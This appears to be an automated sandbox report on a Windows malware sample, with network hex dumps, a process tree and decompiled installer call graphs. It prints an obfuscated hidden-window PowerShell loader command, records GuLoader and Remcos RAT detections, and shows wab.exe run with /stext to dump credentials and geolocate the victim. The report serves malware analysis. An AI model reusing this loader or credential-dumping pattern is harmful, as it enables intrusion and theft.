                                                Data Ascii: Z5\%Nq=6x(GH,I@/QZJj"gc{`f&Tp~gW6#e+.7X3R';khe_.J#'EVyIrwQb;\<.<k",S$@fI5 0cnFR0wm[AjkCW6`>KQqW
                                                Apr 22, 2024 13:33:53.839405060 CEST1289INData Raw: 33 01 04 a0 13 fd 61 96 f2 e7 42 51 c2 05 a7 79 74 c4 8a ba 45 e5 50 a5 4d 4d 13 a2 49 a9 f1 e3 53 2c 51 c8 48 c6 f4 53 8f e6 46 79 78 b7 8e a6 c6 18 fb 96 d5 03 11 72 ee 6a a3 b0 9e 22 4b 7f 51 d4 75 47 70 a8 7f d9 b2 d4 b3 83 82 7e 8a 0e 26 e3
                                                Data Ascii: 3aBQytEPMMIS,QHSFyxrj"KQuGp~&Fp;NYlxPT=?;_>!^t^FX}A>tpg/H7"0oK2mo2ux$$Lu6fHq4Z}hFkN6du
                                                Apr 22, 2024 13:33:53.839493036 CEST1289INData Raw: 90 21 a9 67 ea c5 e9 2e d4 fb e1 27 64 1b 37 40 71 8a 47 af bd 80 6b 8e 87 f8 94 d9 67 eb 9b 15 bb 00 14 66 e6 58 e1 69 83 a1 79 62 7c 80 f7 5c 72 d6 c1 6a 59 38 5a 53 62 d5 f5 ff cc cb d1 68 66 d2 4c ac 9e 22 d1 7f 06 72 0d 28 07 b5 81 a7 21 3b
                                                Data Ascii: !g.'d7@qGkgfXiyb|\rjY8ZSbhfL"r(!;)CS#8Z~MEK?CEHJ?<@TnBx}MuVWA}i|lW +k&4MIv51^uXxsq(2pYgqKQ6U+x`
                                                Apr 22, 2024 13:33:53.839591026 CEST1289INData Raw: 34 80 4b 8b 1d d4 c1 1a 84 8f 7b 4e 3a 22 b5 12 28 02 26 67 63 bd 8b c2 c9 95 5f 5d 62 23 5e a5 fc da 5c 61 b7 09 e6 5c d7 12 dd 36 46 3a 94 2d 99 d7 54 2f ff 72 e8 ad b0 46 c7 70 39 de 3d 40 21 3e fb 7d ca c0 cb 6b d4 78 94 32 96 b6 27 ba 53 fd
                                                Data Ascii: 4K{N:"(&gc_]b#^\a\6F:-T/rFp9=@!>}kx2'S-o'U.+`yWy<4%4iNSt.~)Glh|mP]})R2-hNX`&RspqT(GbE({Mh>:o
                                                Apr 22, 2024 13:33:53.839708090 CEST1289INData Raw: e9 32 03 cc 99 49 2b 20 34 9f f7 1e f6 60 f5 70 8a 2f 66 41 39 3a cc 85 ca d3 46 8e 48 95 ed 94 83 cd 96 f5 a6 41 77 6b de 89 cb 1e 16 56 6d cb 83 8e 2c 97 83 49 de d9 8c 6f d8 62 01 1e b5 40 fa 51 65 b1 16 e5 d8 5f 2e a9 a5 c8 86 55 c7 dc 09 4a
                                                Data Ascii: 2I+ 4`p/fA9:FHAwkVm,Iob@Qe_.UJ, wIG\ F&8_I`K}wvun2Eh/g|.[(n=[$G?)pUXX?u(;j$Oe
                                                Apr 22, 2024 13:33:53.839807987 CEST1289INData Raw: 09 73 16 87 17 07 22 c7 88 64 2f 2a d8 5d 89 70 fc 92 48 70 4e b5 88 72 04 2a 76 d0 60 ba a6 d3 2f 8c cc 6b e5 4e 27 59 a4 a8 ef eb b5 8f 3f bb b4 d6 bd e5 26 aa 3d 3e 97 f8 e0 f9 47 08 41 92 9e 10 41 a9 0b 0e 01 bd 0b e5 e3 2f 2b 5f 53 71 2b 9f
                                                Data Ascii: s"d/*]pHpNr*v`/kN'Y?&=>GAA/+_Sq+18E<UK2*_|*=y7=+m,C/':Av`x.EmF*PLOB?.zX(4ace[k &AB9zj.^&&
                                                Apr 22, 2024 13:33:54.008874893 CEST1289INData Raw: f1 6c a4 38 b4 10 78 97 73 72 18 38 d1 56 4f 2a b8 8f e1 0f 7d c5 04 d1 e4 24 09 9d de 24 b8 90 91 9f 3d 8c 9b 09 5a 98 51 06 6c f7 ad fa 7a 4e 1f 69 06 5b 97 d5 94 3c e2 f3 82 4d 58 c5 00 71 d0 c0 61 9c a9 12 9d e4 22 97 c4 48 75 b4 30 68 0f 31
                                                Data Ascii: l8xsr8VO*}$$=ZQlzNi[<MXqa"Hu0h1|V}E3Mvy9]O$K*<QI@tt8}>T[n^/+sM_K}yvF@K8BiQns|OfQ`eE5H7]uHXa^m8^O


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449738178.237.33.50804048C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 22, 2024 13:34:00.019138098 CEST71OUTGET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Apr 22, 2024 13:34:00.229734898 CEST1171INHTTP/1.1 200 OK
                                                date: Mon, 22 Apr 2024 11:34:00 GMT
                                                server: Apache
                                                content-length: 963
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:13:33:08
                                                Start date:22/04/2024
                                                Path:C:\Users\user\Desktop\87tBuE42ft.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\87tBuE42ft.exe"
                                                Imagebase:0x400000
                                                File size:533'139 bytes
                                                MD5 hash:EF53493176B714D7C8C972A756CFD806
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:13:33:10
                                                Start date:22/04/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness)
                                                Imagebase:0x9b0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2241395545.000000000AB10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:13:33:10
                                                Start date:22/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:13:33:11
                                                Start date:22/04/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:13:33:44
                                                Start date:22/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x240000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4207090075.0000000002B5F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:8
                                                Start time:13:34:01
                                                Start date:22/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"
                                                Imagebase:0x4b0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:9
                                                Start time:13:34:01
                                                Start date:22/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"
                                                Imagebase:0x240000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:10
                                                Start time:13:34:01
                                                Start date:22/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"
                                                Imagebase:0x240000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:11
                                                Start time:13:34:01
                                                Start date:22/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"
                                                Imagebase:0x240000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:12
                                                Start time:13:34:01
                                                Start date:22/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"
                                                Imagebase:0x240000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:13
                                                Start time:13:34:01
                                                Start date:22/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hiugykswhvtyselocvbjhr"
                                                Imagebase:0x240000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:19.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.5%
                                                  Total number of Nodes:1377
                                                  Total number of Limit Nodes:27
                                                  execution_graph 4023 4047c0 4024 4047d8 4023->4024 4031 4048f2 4023->4031 4028 404601 22 API calls 4024->4028 4025 40495c 4026 404a26 4025->4026 4027 404966 GetDlgItem 4025->4027 4033 404668 8 API calls 4026->4033 4029 404980 4027->4029 4030 4049e7 4027->4030 4032 40483f 4028->4032 4029->4030 4038 4049a6 SendMessageW LoadCursorW SetCursor 4029->4038 4030->4026 4039 4049f9 4030->4039 4031->4025 4031->4026 4034 40492d GetDlgItem SendMessageW 4031->4034 4036 404601 22 API calls 4032->4036 4037 404a21 4033->4037 4056 404623 KiUserCallbackDispatcher 4034->4056 4041 40484c CheckDlgButton 4036->4041 4060 404a6f 4038->4060 4043 404a0f 4039->4043 4044 4049ff SendMessageW 4039->4044 4040 404957 4057 404a4b 4040->4057 4054 404623 KiUserCallbackDispatcher 4041->4054 4043->4037 4048 404a15 SendMessageW 4043->4048 4044->4043 4048->4037 4049 40486a GetDlgItem 4055 404636 SendMessageW 4049->4055 4051 404880 SendMessageW 4052 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4051->4052 4053 40489d GetSysColor 4051->4053 4052->4037 4053->4052 4054->4049 4055->4051 4056->4040 4058 404a59 4057->4058 4059 404a5e SendMessageW 4057->4059 4058->4059 4059->4025 4063 405ca8 ShellExecuteExW 4060->4063 4062 4049d5 LoadCursorW SetCursor 4062->4030 4063->4062 4064 402643 4065 402672 4064->4065 4066 402657 4064->4066 4068 4026a2 4065->4068 4069 402677 4065->4069 4067 402d89 21 API calls 4066->4067 4077 40265e 4067->4077 4071 402dab 21 API calls 4068->4071 4070 402dab 21 API calls 4069->4070 4073 40267e 4070->4073 4072 4026a9 lstrlenW 4071->4072 4072->4077 4081 4066a4 WideCharToMultiByte 4073->4081 4075 402692 lstrlenA 4075->4077 4076 4026ec 4077->4076 4080 4026d6 4077->4080 4082 406253 SetFilePointer 4077->4082 4078 406224 WriteFile 4078->4076 4080->4076 4080->4078 4081->4075 4083 40626f 4082->4083 4088 406287 4082->4088 4084 4061f5 ReadFile 4083->4084 4085 40627b 4084->4085 4086 406290 SetFilePointer 4085->4086 4087 4062b8 SetFilePointer 4085->4087 4085->4088 4086->4087 4089 40629b 4086->4089 4087->4088 4088->4080 4090 406224 WriteFile 4089->4090 4090->4088 3390 403645 SetErrorMode GetVersionExW 3391 4036d1 3390->3391 3392 403699 GetVersionExW 3390->3392 3393 403728 3391->3393 3394 406a76 5 API calls 3391->3394 3392->3391 3395 406a06 3 API calls 3393->3395 3394->3393 3396 40373e lstrlenA 3395->3396 3396->3393 3397 40374e 3396->3397 3398 406a76 5 API calls 3397->3398 3399 403755 3398->3399 3400 406a76 5 API calls 3399->3400 3401 40375c 3400->3401 3402 406a76 5 API calls 3401->3402 3403 403768 #17 OleInitialize SHGetFileInfoW 3402->3403 3478 406682 lstrcpynW 3403->3478 3406 4037b7 GetCommandLineW 3479 406682 lstrcpynW 3406->3479 3408 4037c9 3409 405f7e CharNextW 3408->3409 3410 4037ef CharNextW 3409->3410 3420 403801 3410->3420 3411 403903 3412 403917 GetTempPathW 3411->3412 3480 403614 3412->3480 3414 40392f 3416 403933 GetWindowsDirectoryW lstrcatW 3414->3416 3417 403989 DeleteFileW 3414->3417 3415 405f7e CharNextW 3415->3420 3418 403614 12 API calls 3416->3418 3490 4030d5 GetTickCount GetModuleFileNameW 3417->3490 3421 40394f 3418->3421 3420->3411 3420->3415 3424 403905 3420->3424 3421->3417 3423 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3421->3423 3422 40399d 3430 405f7e CharNextW 3422->3430 3461 403a44 3422->3461 3469 403a54 3422->3469 3425 403614 12 API calls 3423->3425 3576 406682 lstrcpynW 3424->3576 3428 403981 3425->3428 3428->3417 3428->3469 3434 4039bc 3430->3434 3432 403ba2 3659 405ce2 3432->3659 3433 403bc6 3436 403c4a ExitProcess 3433->3436 3437 403bce GetCurrentProcess OpenProcessToken 3433->3437 3438 403a1a 3434->3438 3439 403a5d 3434->3439 3442 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 3437->3442 3443 403c1a 3437->3443 3577 406059 3438->3577 3593 405c4d 3439->3593 3442->3443 3444 406a76 5 API calls 3443->3444 3447 403c21 3444->3447 3451 403c36 ExitWindowsEx 3447->3451 3453 403c43 3447->3453 3451->3436 3451->3453 3452 403a7c 3455 403a85 3452->3455 3475 403a94 3452->3475 3456 40140b 2 API calls 3453->3456 3597 406682 lstrcpynW 3455->3597 3456->3436 3457 403a39 3592 406682 lstrcpynW 3457->3592 3460 403aba wsprintfW 3462 4066bf 21 API calls 3460->3462 3520 403d54 3461->3520 3462->3475 3465 403b30 SetCurrentDirectoryW 3640 406442 MoveFileExW 3465->3640 3466 403af6 GetFileAttributesW 3467 403b02 DeleteFileW 3466->3467 3466->3475 3467->3475 3650 403c62 3469->3650 3472 406442 40 API calls 3472->3475 3473 4066bf 21 API calls 3473->3475 3475->3460 3475->3465 3475->3466 3475->3469 3475->3472 3475->3473 3476 403bb8 CloseHandle 3475->3476 3598 405bd6 CreateDirectoryW 3475->3598 3601 405c30 CreateDirectoryW 3475->3601 3604 405d8e 3475->3604 3644 405c65 CreateProcessW 3475->3644 3647 4069df FindFirstFileW 3475->3647 3476->3469 3478->3406 3479->3408 3481 406930 5 API calls 3480->3481 3483 403620 3481->3483 3482 40362a 3482->3414 3483->3482 3663 405f51 lstrlenW CharPrevW 3483->3663 3486 405c30 2 API calls 3487 403638 3486->3487 3666 4061a1 3487->3666 3670 406172 GetFileAttributesW CreateFileW 3490->3670 3492 403118 3519 403125 3492->3519 3671 406682 lstrcpynW 3492->3671 3494 40313b 3672 405f9d lstrlenW 3494->3672 3498 40314c GetFileSize 3499 403246 3498->3499 3518 403163 3498->3518 3677 403033 3499->3677 3503 40328b GlobalAlloc 3504 4032a2 3503->3504 3509 4061a1 2 API calls 3504->3509 3506 4032e3 3507 403033 36 API calls 3506->3507 3507->3519 3508 40326c 3510 4035e7 ReadFile 3508->3510 3511 4032b3 CreateFileW 3509->3511 3513 403277 3510->3513 3514 4032ed 3511->3514 3511->3519 3512 403033 36 API calls 3512->3518 3513->3503 3513->3519 3692 4035fd SetFilePointer 3514->3692 3516 4032fb 3693 403376 3516->3693 3518->3499 3518->3506 3518->3512 3518->3519 3708 4035e7 3518->3708 3519->3422 3521 406a76 5 API calls 3520->3521 3522 403d68 3521->3522 3523 403d80 3522->3523 3524 403d6e 3522->3524 3525 406550 3 API calls 3523->3525 3770 4065c9 wsprintfW 3524->3770 3526 403db0 3525->3526 3528 403dcf lstrcatW 3526->3528 3530 406550 3 API calls 3526->3530 3529 403d7e 3528->3529 3755 40402a 3529->3755 3530->3528 3533 406059 18 API calls 3534 403e01 3533->3534 3535 403e95 3534->3535 3537 406550 3 API calls 3534->3537 3536 406059 18 API calls 3535->3536 3538 403e9b 3536->3538 3544 403e33 3537->3544 3539 403eab LoadImageW 3538->3539 3540 4066bf 21 API calls 3538->3540 3541 403f51 3539->3541 3542 403ed2 RegisterClassW 3539->3542 3540->3539 3546 40140b 2 API calls 3541->3546 3545 403f08 SystemParametersInfoW CreateWindowExW 3542->3545 3575 403f5b 3542->3575 3543 403e54 lstrlenW 3548 403e62 lstrcmpiW 3543->3548 3549 403e88 3543->3549 3544->3535 3544->3543 3547 405f7e CharNextW 3544->3547 3545->3541 3550 403f57 3546->3550 3552 403e51 3547->3552 3548->3549 3553 403e72 GetFileAttributesW 3548->3553 3551 405f51 3 API calls 3549->3551 3554 40402a 22 API calls 3550->3554 3550->3575 3555 403e8e 3551->3555 3552->3543 3556 403e7e 3553->3556 3558 403f68 3554->3558 3771 406682 lstrcpynW 3555->3771 3556->3549 3557 405f9d 2 API calls 3556->3557 3557->3549 3560 403f74 ShowWindow 3558->3560 3561 403ff7 3558->3561 3563 406a06 3 API calls 3560->3563 3763 4057da OleInitialize 3561->3763 3565 403f8c 3563->3565 3564 403ffd 3566 404001 3564->3566 3567 404019 3564->3567 3568 403f9a GetClassInfoW 3565->3568 3570 406a06 3 API calls 3565->3570 3573 40140b 2 API calls 3566->3573 3566->3575 3569 40140b 2 API calls 3567->3569 3571 403fc4 DialogBoxParamW 3568->3571 3572 403fae GetClassInfoW RegisterClassW 3568->3572 3569->3575 3570->3568 3574 40140b 2 API calls 3571->3574 3572->3571 3573->3575 3574->3575 3575->3469 3576->3412 3773 406682 lstrcpynW 3577->3773 3579 40606a 3774 405ffc CharNextW CharNextW 3579->3774 3582 403a26 3582->3469 3591 406682 lstrcpynW 3582->3591 3583 406930 5 API calls 3589 406080 3583->3589 3584 4060b1 lstrlenW 3585 4060bc 3584->3585 3584->3589 3586 405f51 3 API calls 3585->3586 3588 4060c1 GetFileAttributesW 3586->3588 3587 4069df 2 API calls 3587->3589 3588->3582 3589->3582 3589->3584 3589->3587 3590 405f9d 2 API calls 3589->3590 3590->3584 3591->3457 3592->3461 3594 406a76 5 API calls 3593->3594 3595 403a62 lstrlenW 3594->3595 3596 406682 lstrcpynW 3595->3596 3596->3452 3597->3475 3599 405c22 3598->3599 3600 405c26 GetLastError 3598->3600 3599->3475 3600->3599 3602 405c44 GetLastError 3601->3602 3603 405c40 3601->3603 3602->3603 3603->3475 3605 406059 18 API calls 3604->3605 3606 405dae 3605->3606 3607 405db6 DeleteFileW 3606->3607 3608 405dcd 3606->3608 3637 405f04 3607->3637 3609 405eed 3608->3609 3780 406682 lstrcpynW 3608->3780 3616 4069df 2 API calls 3609->3616 3609->3637 3611 405df3 3612 405e06 3611->3612 3613 405df9 lstrcatW 3611->3613 3615 405f9d 2 API calls 3612->3615 3614 405e0c 3613->3614 3617 405e1c lstrcatW 3614->3617 3619 405e27 lstrlenW FindFirstFileW 3614->3619 3615->3614 3618 405f12 3616->3618 3617->3619 3620 405f51 3 API calls 3618->3620 3618->3637 3619->3609 3622 405e49 3619->3622 3621 405f1c 3620->3621 3623 405d46 5 API calls 3621->3623 3625 405ed0 FindNextFileW 3622->3625 3633 405d8e 64 API calls 3622->3633 3635 405707 28 API calls 3622->3635 3638 405707 28 API calls 3622->3638 3639 406442 40 API calls 3622->3639 3781 406682 lstrcpynW 3622->3781 3782 405d46 3622->3782 3626 405f28 3623->3626 3625->3622 3627 405ee6 FindClose 3625->3627 3628 405f42 3626->3628 3629 405f2c 3626->3629 3627->3609 3631 405707 28 API calls 3628->3631 3632 405707 28 API calls 3629->3632 3629->3637 3631->3637 3634 405f39 3632->3634 3633->3622 3636 406442 40 API calls 3634->3636 3635->3625 3636->3637 3637->3475 3638->3622 3639->3622 3641 403b3f CopyFileW 3640->3641 3642 406456 3640->3642 3641->3469 3641->3475 3793 4062c8 3642->3793 3645 405ca4 3644->3645 3646 405c98 CloseHandle 3644->3646 3645->3475 3646->3645 3648 406a00 3647->3648 3649 4069f5 FindClose 3647->3649 3648->3475 3649->3648 3651 403c73 CloseHandle 3650->3651 3652 403c7d 3650->3652 3651->3652 3653 403c91 3652->3653 3654 403c87 CloseHandle 3652->3654 3827 403cbf 3653->3827 3654->3653 3657 405d8e 71 API calls 3658 403b95 OleUninitialize 3657->3658 3658->3432 3658->3433 3660 405cf7 3659->3660 3661 403bb0 ExitProcess 3660->3661 3662 405d0b MessageBoxIndirectW 3660->3662 3662->3661 3664 403632 3663->3664 3665 405f6d lstrcatW 3663->3665 3664->3486 3665->3664 3667 4061ae GetTickCount GetTempFileNameW 3666->3667 3668 4061e4 3667->3668 3669 403643 3667->3669 3668->3667 3668->3669 3669->3414 3670->3492 3671->3494 3673 405fab 3672->3673 3674 405fb1 CharPrevW 3673->3674 3675 403141 3673->3675 3674->3673 3674->3675 3676 406682 lstrcpynW 3675->3676 3676->3498 3678 403044 3677->3678 3679 40305c 3677->3679 3680 40304d DestroyWindow 3678->3680 3683 403054 3678->3683 3681 403064 3679->3681 3682 40306c GetTickCount 3679->3682 3680->3683 3712 406ab2 3681->3712 3682->3683 3684 40307a 3682->3684 3683->3503 3683->3519 3711 4035fd SetFilePointer 3683->3711 3686 403082 3684->3686 3687 4030af CreateDialogParamW ShowWindow 3684->3687 3686->3683 3716 403017 3686->3716 3687->3683 3689 403090 wsprintfW 3719 405707 3689->3719 3692->3516 3694 4033a1 3693->3694 3695 403385 SetFilePointer 3693->3695 3730 40347e GetTickCount 